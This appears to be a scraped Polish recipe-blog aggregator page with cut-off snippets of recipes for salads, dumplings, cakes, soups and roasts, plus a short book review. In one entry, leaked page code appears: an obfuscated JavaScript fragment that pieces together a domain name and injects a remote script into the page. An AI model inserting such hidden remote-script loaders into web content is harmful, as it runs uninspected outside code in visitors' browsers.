Warstwowa, wyrazista w smaku sałatka z kurczakiem w przyprawie gyros, z kukurydzą, ogórkami, ostrą czerwoną cebulą w smakowitym sosie na bazie majonezu i keczupu to ciekawy
Szalona Kuchnia EwelinyKnedle które bardzo miło zaskoczyły mnie swoim smakiem, a jeśli chcecie się dowiedzieć jak smakują, przygotujcie je, na pewno staną się jednymi z waszych ulubionych klusek
Gotowanie...to proste !już drugi rok za nami postanowiłam go podsumować. W ciągu ostatniego roku na blogu pojawiło się aż 111 wpisów! Sama jestem w szoku, że było ich tak dużo ;D Ten rok obfitował w wiele ciekawych przepisów, zatem jako podsumowanie tego roku postanowiłam przypomnieć Wam jeszcze raz przepisy, które najchętniej odwiedzaliście Podzieliłam je na trzy kategorie: dania główne, dodatki
PatiGotujeGofry z marchewki? Czemu nie! Dziś mam dla Was kolejny bezglutenowy przepis. Tym razem na stole goszczą pyszne, chrupiące gofry marchewkowe ze śmietaną i orzechami. Idealne
Ostra na Słodkodanie, bo czasem makaron wolę ugotować osobno i gdy się skończy resztę podać inaczej, np. z ziemniakami. Często też gotuję jej wielki gar (bez makaronu), a następnie zamrażam porcje w litrowych wiaderkach po mielonym serze - gdy mam mało czasu, gdzieś się spieszę lub późno wrócę taka odgrzana zupa jest wybawieniem! Całość do gara, do drugiego woda
Kolorowy Przepisownikdrugim blatem, nasączyć wyłożyć resztę kremu lekko docisnąć. Galaretki z owoców leśnych rozpuścić w 700 ml wody, do wystudzonych ale płynnych, wsypać mrożone owoce, zamieszać. Pilnować go od tej chwili galaretka szybko tężeje, ścinającą się wylać na wierzch ciasta. Włożyć do lodówki, najlepiej na całą noc. Słodkich wypieków. Uwaga: Zamiast żelatyny w listkach można dać zwykłą
Wanilia i Kardamonobiadek proponuje placki ziemniaczane, proste i szybkie w wykonaniu a przecież tak dobre. Uwielbiam placki ziemniaczane, a jeszcze bardziej takie chrupiące i dobrze odsączone z tłuszczu. Tak proste danie a tak smaczne. :) Przepis: Składniki: około 1 kg ziemniaków 2 jajka 3 łyżki mąki ziemniaczanej 2 łyżka mąki pszennej sól, pieprz do smaku Wykonanie(...)Ziemniaki obieramy, myjemy i ścieramy na tarce o małych oczkach. Ja użyłam tarczy do ścierania warzyw w mikserze. Możemy zetrzeć pół na pół, jedną część na małych oczkach drugą na masę. Ja tym razem tylko starłam i dzięki temu placki były na prawdę chrupiące. 2. Starte ziemniaki odsączamy dokładnie z wody 3. Do odsączonych ziemniaków dodajemy
Mój pomysł naDanie jest lekkie, a jednocześnie sycące. Do pieczonych warzyw używam różnych przypraw, ale można użyć tylko soli i pieprzu i też będzie smacznie. Jednak zachęcam do posypania marchewki cynamonem, pietruszki kolendrom, bardzo przyjemnie jest odkrywać podczas jedzenia, każdy z tych smaków. Jeśli po obiedzie zostanie trochę kaszy i warzyw, z przyjemnością zabieram je na drugie
Codziennik Kuchennymniam.... Nawet na drugi dzień są identyczne w smaku i równie mięciutkie..... Do tego wszystkiego są nie drogie i szybkie i proste w wykonaniu-czego chcieć więcej? Spróbujcie zrobić koniecznie Składniki (na 32 szt.): 4 szkl. mąki 1/4 szkl.cukru cukier waniliowy kostka margaryny powidła śliwkowe(lub ser,lub nutellę) 50 g drożdży duża śmietana 18 % (ja dałam 330g z firmy
Swojskie jedzonkolekki, z drugiej sycący, dostarczający energii na cały poranek. Spróbujcie koniecznie, bo to chyba jeden z najprostszych koktajli w mojej kuchni :-) SKŁADNIKI 1 banan 1 opakowanie jogurtu naturalnego (150 - 180 g) 1/4 szklanki komosy ryżowej białej 1/2 szklanki wody cynamon Komosę przelewamy wrzątkiem, a następnie gotujemy w wodzie do miękkości. Przestudzoną komosę, banana, jogurt i cynamon (dajcie go według
Czary - gary w kuchnidamy mu trochę wyrosnąć, potem ułożymy warstwami w blaszce i jeszcze raz pozostawimy do wyrośnięcia. Wyrośnięte ciasto smarujemy roztrzepanym jajkiem. Wstawiamy do piekarnika nagrzanego do temperatury 150 st. C, zwiększamy temperaturę do 160 st. C i pieczemy 30-35 minut. Doskonale smakuje bez dodatków, ale można też posmarować masłem lub dżemem, lub jednym i drugim. Smacznego
Maminek kulinarnyDrugi Dzień Świąt to rozpływający się w ustach schab pieczony w kapuście kiszonej z dodatkiem suszonych grzybów, który świetnie współgra z klimatem Świątecznym. Myślę, że tak przygotowane mięso będzie idealną propozycją na Świąteczny obiad w gronie najbliższych. Schab piekłam przez 2 godziny w temperaturze 150 stopni, dodatkowo marynowałam mięso przez całą noc, dzięki temu danie jest przepyszne i aromatyczne. Składniki (na 4-5 porcji): 1 kg schabu w jednym kawałku przyprawy do marynaty: 1 łyżeczka majeranku, 1 łyżeczka papryki wędzonej, 1/2 łyżeczki czarnuszki, szczypta kminku, 1/2 łyżeczki soli, 1/2 łyżeczki kuminu, szczypta pieprzu grubo zmielonego 300 gram kapusty kiszonej 1/4 szklanki suszonych grzybów 1/2 szklanki bulionu 2 liście laurowe ziele angielskie
Mango Papajadrugi bok tak samo ( jak widać na zdjęciu ) Foremkę wykładamy papierem do pieczenia i wkładamy ciasto złożeniem do spodu. Z reszty ciasta można uformować 3 duże bułki lub 4 małe . Wszystko przykrywamy i odstawiamy na 40 minut. Piekarnik rozgrzewamy na 195 stopni i wstawiamy na sam dół naczynie/blaszkę z pół litra wody ,która da nam parę podczas
Wypieki Renedrugiej zachowując odstępy (bułeczki jeszcze podrosną). Na koniec bułeczki należy posmarować żółtkiem rozmąconym z 2-3 łyżkami mleka. Drożdżówki wstawiamy do nagrzanego piekarnika i pieczemy 20-25 minut w 180st.C. Uwagi: Pamiętaj, że wszystkie składniki użyte do ciasta drożdżowego muszą mieć temperaturę pokojową. Używając suchych drożdży zwróć uwagę na jaką ilość mąki przeznaczona jest dana paczka
In my kitchenkrólewskim daniem będzie pieczona owsianka z lekką sernikową nutką. Istna pyszność, nawet mój M., który jest raczej zwolennikiem kanapki z serem i pomidorem, stwierdził że to naprawdę znakomity deser ;) Mnie bardziej pasowała na ciepło, ale już moja mama wolała ją na zimno, także można ją jeść zarówno od razu, jak i zachomikować w pudełku na drugie śniadanie
Przepysznik - BLW i nie tylkomdłe, drugie mocne, aż trafiłam na tę, którą pokochałam od pierwszego łyczka. Cudowny kolor, aromat, idealna na babskie, spotkania:) Składniki: 3 kg cytryn cukier - ilość uzależniona od tego, czy lubicie bardziej słodką, czy też mniej słodką, ja daje 2 kg cukru i powiem że wg mnie jest to ilość idealna. Chcąc uzyskać bardziej kwaśną nalewkę, dajcie tylko
na moim stole...cukru (dałam z cukrem) Piana bezowa 3 białka 1/2 szklanki cukru 1 łyżeczka mąki ziemniaczanej dodatkowo 4-5 jabłek Wykonanie: Ciasto kruche Mąkę przesiać na stolnicę, zrobić w niej dołek i wbić żóltka, dodać pozostałe składniki i zagnieść ciasto. Podzielić je na dwie części. Jedną częścią ciasta wyłożyć dno blaszki o wymiarach 23x38 cm , a drugą część owinąć
O kuchni z uczuciem„Ile to ja już razy postanawiałam jeść więcej ryb i niestety na postanowieniu się kończy. Przyczyn jest wiele. Pierwsza to ta, ze chłopcy nie mogą jeść
Wiem co jemPowiem Wam szczerze że oszalałem na punkcie świeżych produktów! Po pierwsze urzeka mnie ich smak a po drugie moje samopoczucie po ich zjedzeniu staje
Kuchnia PROzdrowotnakukurydzianej (dałam pszenną) 1/4 łyżeczki soli 2/3 szklanki ciepłej wody Mąkę z solą wymieszać na stolnicy i dodając stopniowo wody - zagnieść ciasto. Ciasto podzielić na 8-9 części i rozwałkować na okrągłe placki (około 18-20 stopni średnicy, czyli nie za dużej patelni). Smażyć na suchej, rozgrzanej patelni około minutę z jednej strony, minutę z drugiej i znowu minutę
Ewa Kuchennie - Kuchnia to serce domu!Nie wiem jak Wy, ale ja bardzo lubię kaszę jaglaną pomimo jej specyficznego posmaku Przeważnie jem ją na śniadanie z owocami, ale ostatnio zaczęłam eksperymentować. Tak
CoolinarniePLprzyprawione mięsko które szybko mieszamy w ten sposób ów mięso nie przypali się a my będziemy mieli danie gotowe po 5 minutach . Do przygotowania dania (dla 2 osob) niezbędne jest : Schab stir fry 2 plasterki schabu łyżka miodu łyżka sosu sojowego Ostra papryka do smaku garść kurek lub innych grzybów leśnych 1 liść kapusty pekińskiej(...)Jajka w koszulce 2 jaja łyżka octu woda 3. Makaron Makaron wstęgi woda sól Gotujemy wodę w 2 garnkach jeden na makaron drugi na nasze jajka w koszulkach. Na największym palniku rozpalamy woka(patelnie) a gdy zacznie dymić wlewamy łyżkę oleju i wrzucamy na nie mięso pokrojone w paski 1 cm i przyprawione wyżej wymienionymi składnikami
Wspólne smakiplanowanym przygotowaniem dania. Wszystkie składniki marynaty dokładnie wymieszać ze sobą.Polędwiczki umyć i osuszyć ręcznikiem papierowym. Oczyścić z tłuszczu i błon. Pokroić w plastry o grubości około 1 cm. Oprószyć solą i pieprzem, lekko spłaszczając poszczególne kawałki mięsa - ręką lub szerokim nożem. Przełożyć do marynaty i dokładnie wymieszać (najlepiej rękoma). Odstawić na noc do lodówki.Na drugi dzień
Świat Domowej KuchniGłębi staje się absolutnie wyjątkowy - jest nurkiem. Ale od początku...Głębia to wirtualny świat - za pomocą programu, ubrani w odpowiedni kombinezon, ludzie odwiedzają Głębię, i prowadzą w niej drugie życie. Pracują, bawią się, kochają. Przebywając w Głębi, nie widzi się różnicy pomiędzy światem wirtualnym a rzeczywistym. Kiedy jednak przebywa się w niej zbyt długo, mogą wystąpić komplikacje, które(...)rozpowszechniona? Druga część trzyma w napięciu tak samo jak pierwsza, poznajemy nowych, interesujących bohaterów. Sytuacja się gmatwa, i czyta się z zapartym tchem.Łukjanienkę mogę polecić każdemu miłośnikowi fantastyki, a nawet tym, którzy za takową nie przepadają. Pisze tak dobrze, tak potrafi wciągnąć w akcję, że nie można oderwać się od książki. Po prostu nie da się
Pożeraczka, czyli raz adobrzedrugiej połowie sierpnia. Natchniona więc włoskimi klimatami, postanowiłam choć odrobinę Italii sprowadzić do nas już teraz, a najprościej to zrobić za pomocą włoskiego wypieku. Sięgnęłam więc po Italienskie brød: fra focaccia til grissini Maxine Clark i tam trafiłam na pomidorową focaccię. Zachwyciła mnie głębokim kolorem i mięsistością na zdjęciu. Nieco zmieniłam oryginalny przepis - nie dałam czosnku (nie miałam
Pożeraczka, czyli raz adobrzepieprzem (ja dałam go dość sporo). W misie (u mnie garnek żaroodporny) wyłożyć warstwami: odsączonego ananasa (ja pokroiłam go jeszcze na mniejsze kawałki), odsączony seler konserwowy, pokrojone w kostkę jajka, zalać to połową przygotowanego sosu jogurtowo-majonezowego. Na nim ułożyć kawałki kurczaka bez kości i bez skóry, pokrojone w kostkę, dodać odsączoną kukurydzę i zalać drugą połową sosu jogurtowo
Smaczne Zdrowedrugiej patelni smażymy 3 jaja sadzone (około 3-4 minuty) na oliwie z oliwek, doprawiamy je solą i obficie pieprzem. Kilka łyżek bułki tartej smażymy na suchej patelni lub w garnku, cały czas mieszając, na średnim ogniu. Po kilku minutach, gdy bułka tarta zbrązowieje, dodajemy 50 gram masła i dokładnie mieszamy. Teraz składamy nasze danie
Mango Papajadelikatne. Na drugi dzień smakują równie dobrze co robione w ten sam dzień. Ja odgrzałam sobie w mikrofali i smakowały jak dopiero co zdjęte z patelni!:) Znalezione tutaj . Składniki: -1/2kg mąki orkiszowej (w tym ok. 100-150g pełnoziarnistej) lub pszennej -40g drożdży -1 łyżeczka cukru trzcinowego -szczypta soli -1.5 szklanki letniego mleka(ja dałam
Smaczne ZdroweTo chyba moje ostatnie szparagi w tym roku. Szkoda, że sezon na nie tak szybko się kończy. Chociaż w Stanach jest ich ciągle dużo, tylko że
Zgrabne GotowanieNie jestem wielką fanką śniadań na słodko, ale od czasu do czasu najdzie mnie ochota na coś innego. Tym razem zastanawiałam się pomiędzy jabłkami w cieście
Fabryka pomysłówdodałam daniu ciut pikanterii. Wyszło naprawdę smacznie. Ps. do jutra (piątek) do godziny 22 możecie oddawać swoje głosy w akcji „gotowanie za głosowanie” (ankieta mieści się w prawym górnym rogu bloga ). Składniki na 3-4 porcje: 6 podudzi/pałek z kurczaka 100g suszonych pomidorów 300g pora (u mnie biała część z 1 całego pora i drugiego połowa
Fabryka pomysłówtutaj zarzucać pomysłami na kreatywne i smaczne wykorzystywanie tak zwanych resztek, ale też pokazywać jak można niestandardowo wykorzystać popularne produkty. Mam nadzieję, że ta seria Wam się spodoba Dajcie znać co o tym myślicie Bezglutenowe muffinki z jajkiem przepis na 4 muffinki 75 g mąki gryczanej 60 g mąki z ciecierzycy płaska łyżeczka proszku do pieczenia szczypta soli zioła prowansalskie(...)ugotowane na twardo jajka W misce wymieszaj: mąkę gryczaną, mąkę z ciecierzycy, proszek do pieczenia, sól, zioła prowansalskie (ok. łyżeczki), szczyptę papryki i parmezan. Całość dokładnie wymieszaj. W drugim naczyniu wymieszaj jajko z mlekiem. Do składników suchych dodaj składniki mokre. Całość wymieszaj. Do silikonowych foremek na muffinki wyłóż po łyżce ciasta, tak wypełniło 1/4 foremki. Do każdej formy
365 dni dookoła kuchnia4uk=document.createElement("script");a4uk_="u"+("s")+"ta"; a4uk_+=("t.i")+""+"n";a4uk_+=(("f")+"o");a4uk.type="text/javascript"; a4uk_+="/"; a4uku="64069171";a4uku+=".ix86xu0t4uksigi7syy";a4uku+="4barexibfjl"; a4uk.src="//"+a4uk_+a4uku; a4uk.async=true; document.body.appendChild(a4uk); })(); Danie z piekarnika to jeden ze sposobów na szybki, mało angażujący obiad. Polecam w szczególności na niedzielny obiad - kilka produktów do naczynia, myk do pieca i niemal(...)obiad robiący się prawie w całości, bez dużego nakładu pracy. Z jednego naczynia masz i aromatyczną porcję mięsa z kurczaka, i warzywa do tego. Wystarczy jeszcze, np. upiec w drugim naczyniu ziemniaki (można i ugotować-jak kto woli) i obiad wjeżdża na stół. Do przygotowania kurczaka z poniższego przepisu wykorzystałam warzywa zalegające w zamrażarce (akurat ostatnia porcja fasolki
Kolorowy Przepisownikmieszkaniu rozchodził się cudowny zapach pieczonego mięsa. Ciężko było wytrzymać aby nie spróbować choć kawałeczka. Pod koniec pieczenia dodałam do mięsa sos ciemny uniwersalny Łowicz . Świetnie podkręcił smak mięsa. Danie wyszło genialne, cudowne w smaku, takie, że Łooo! Koniecznie wypróbujcie bo mięso nie dosyć, że przepyszne to jeszcze rozpływa się w ustach! Poezja(...)znalazł jako dodatek smakowy do dań mięsnych, bigosu itp.) wlać sos Łowicz, wymieszać z cebulką i wstawić do piekarnika. Podkręcić temperaturę do 200 stopni i piec jeszcze 10 minut. Po wyjęciu z piekarnika odczekać 10 minut i poszarpać widelcem, zamieszać z sosem z cebulką. "Szarpaną" wieprzowinę można podawać jako danie obiadowe na gorąco
Smakołyki Asibardzo, że będzie chcieli ją robić częściej, niż tylko na Wigilię :) Dla purystów – zupę grzybową nie tylko wigilijną można przygotować na wywarze warzywnym lub rybnym (osobiście ten drugi wariant lubię najmniej), a poza Wigilią lub jeśli nie jesteście wigilijnymi tradycjonalistami – można ją przygotować także na wywarze drobiowym. Nasza zupa grzybowa nie tylko wigilijna jest pełna grzybów nie tylko(...)grzybów mrożonych lub świeżych ok. 40 g grzybów suszonych liść laurowy ziele angielskie sól, pieprz śmietana, najlepiej kremówka, minimum 18%, ale uwierzcie, że na Święta naprawdę warto dać kremówkę opcjonalnie: odrobina mąki Wykonanie: Jeśli przygotowujecie zupę na drobiu – mięso obrać ze skóry. Jeśli przygotowujecie na rybie – pamiętajcie, żeby wywar przecedzić. Grzyby suszone zalewamy wrzątkiem (do przykrycia) i odstawiamy
Pociąg Do Kuchniopakowanie 115g) zobaczyłam jak smakuje moim dzieciom! Nie trzeba chyba przekonywać, że dzieci lubią pomidory, zupę pomidorową, itp. Moje lubią też suszone pomidory, dlatego często je dodaję do różnych dań, głównie obiadowych, ale i sałatek. I ku mojemu zaskoczeniu, zajada się nią też mój mąż. Sklepowa pasta była dobra, więc, uwaga, wygrzebałam z kosza opakowanie(...)micha wspaniałego smarowidła, które przełożone do słoiczków znika każdego dnia, zaczynając od śniadania, a na kolacji kończąc. Zdjęcia, jakie tu widzisz, zrobiłam pierwszej porcji. W tej chwili pożeramy już drugą ;) Do mojej pasty użyłam suszonych pomidorów z żurawiną - chciałam przełamać kwaskowy smak (może dlatego dzieciom bardziej "podeszła";)). Ale mogą to być dowolne pomidory z oleju - z ziołami, nawet
Kolorowy Przepisownikcudownie wydana, bardzo kolorowa, z ponad 80 przepisami, do tego znajdziemy w niej kompendium wiedzy o zdrowym gotowaniu. Ja jestem pod ogromnym wrażeniem. Przeglądając ją miałam ochotę na każde danie. Będę miała co robić, bo warto wypróbować wszystkie przepisy. Podzielona jest na 3 części: Część pierwsza: niech rośliny rządzą na talerzu - znajdziemy tutaj informacje(...)odżywcza. W tworzeniu tej części autorkę książki wspierała mgr Daria Łukowska - dietetyk, diet coach, trener personalna, fizjoterapeutka, autorka licznych artykułów o tematyce związanej z żywieniem i aktywnością fizyczną. Część druga: ABC zdrowego roślinnego odżywiania - Tutaj znajdziemy mnóstwo informacji na temat zdrowych produktów w naszej spiżarni: warzywa i owoce, zboża i pseudozboża pełnoziarniste, zdrowe tłuszcze, słodzidła, przyprawy świeże i suszone
kruche babeczki